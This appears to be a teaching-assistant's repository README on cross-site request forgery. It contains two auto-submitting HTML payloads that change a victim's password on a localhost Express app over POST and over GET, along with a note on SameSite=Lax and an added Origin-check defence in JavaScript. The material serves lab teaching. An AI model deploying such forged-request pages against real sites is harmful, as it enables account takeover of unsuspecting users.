realarcherl / csrf
learning CSRF from scratch again to make CTFs for the class I TA (you won't find the challenge CTF here :) )
This issue arises because of the following reasons:
Payload used (csrf_post.html):
```html
<html>
<head>
<title>Simple CSRF</title>
</head>
<body>
<!-- sending the request to vulnerable website to change the password -->
<h1>Hacked!</h1>
<form action="http://localhost:3000/changepass" method="POST">
<input type="hidden" name="password" value="archerl" />
<input type="hidden" name="confirm_password" value="archerl" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
Hosting the web page using a simple Python server: `python3 -m http.server 1337`
The response would be:
```
HTTP/1.1 302 Found
X-Powered-By: Express
```
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H (8.0) in this case, which is debatable.
The web page loads for a second and then redirects to /changepass.
The password is changed, and the 302 redirect in the response confirms that the change went through.
Notice how the victim's cookies are attached to the request sent from csrf_post.html.
Proof that the values were changed (using Prisma Studio here):
This issue arises because of the following reasons:
Payload used (csrf_get.html):
```html
<html>
<head>
<title>CSRF GET</title>
</head>
<body>
<!-- sending the request to vulnerable website to change the password -->
<h1>Hacked!</h1>
<form action="http://localhost:3000/get/getchangepass" method="GET">
<input type="hidden" name="password" value="1234" />
<input type="hidden" name="confirm_password" value="1234" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
Hosting the web page using a simple Python server: `python3 -m http.server 1337`
The response would be:
```
HTTP/1.1 302 Found
X-Powered-By: Express
```
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H (8.0) in this case, which is debatable.
The web page loads for a second and then redirects to /get/getchangepass.
The password is changed, and the 302 redirect in the response confirms that the change went through.
Notice how the victim's cookies are attached to the request sent from csrf_get.html.
The same exploit works even if we log in through /defense1/login, which sets the cookie with SameSite=Lax: Lax still attaches the cookie to top-level GET navigations such as this auto-submitted form, so a password change exposed over GET is not protected by it.
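A server-side check that would stop both payloads above, added here as an example and not part of this repo: it refuses state changes over GET (the /get/getchangepass case that SameSite=Lax does not cover) and compares the browser-supplied Origin (falling back to Referer) against the app's own origin, which includes the port, so a form auto-submitted from http://localhost:1337 does not match http://localhost:3000. Requests are modelled as plain objects so the logic runs without Express; `checkRequest`, `expressGuard` and `allowedOrigin` are names chosen for this example.

```javascript
// Added example, not from this repo: an Origin/method check for the
// /changepass-style endpoints. Requests are plain objects so it runs without
// Express; expressGuard() at the bottom is the middleware shape Express expects.
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Returns the "scheme://host[:port]" part of a URL, or null if unparseable.
function originOf(url) {
  try {
    return new URL(url).origin;
  } catch (e) {
    return null;
  }
}

// Decide whether a request that changes state may proceed.
// allowedOrigin is the app's own origin, e.g. "http://localhost:3000".
function checkRequest(req, allowedOrigin) {
  const method = (req.method || "GET").toUpperCase();
  const headers = {};
  for (const [k, v] of Object.entries(req.headers || {})) {
    headers[k.toLowerCase()] = v;
  }
  // Changing the password over GET (the /get/getchangepass case) is never
  // acceptable: SameSite=Lax cookies still ride along on top-level GET
  // navigations, so state changes are only honoured on non-safe methods.
  if (!STATE_CHANGING.has(method)) {
    return { allowed: false, reason: "state change over safe method " + method };
  }
  // Browsers attach Origin to POST form submissions; it includes the port, so a
  // form auto-submitted from http://localhost:1337 does not match :3000.
  const origin = headers["origin"] || originOf(headers["referer"] || "");
  if (!origin) {
    return { allowed: false, reason: "no Origin or Referer header" };
  }
  if (origin !== allowedOrigin) {
    return { allowed: false, reason: "cross-origin request from " + origin };
  }
  return { allowed: true, reason: "same-origin " + method };
}

// Express-style middleware built on checkRequest: mount it before the
// password-change routes.
function expressGuard(allowedOrigin) {
  return (req, res, next) => {
    const result = checkRequest(req, allowedOrigin);
    if (!result.allowed) {
      res.status(403).send("Forbidden: " + result.reason);
      return;
    }
    next();
  };
}
```

An Origin check is a cheap first layer; a per-session CSRF token in the form remains the standard defence, and the two combine well.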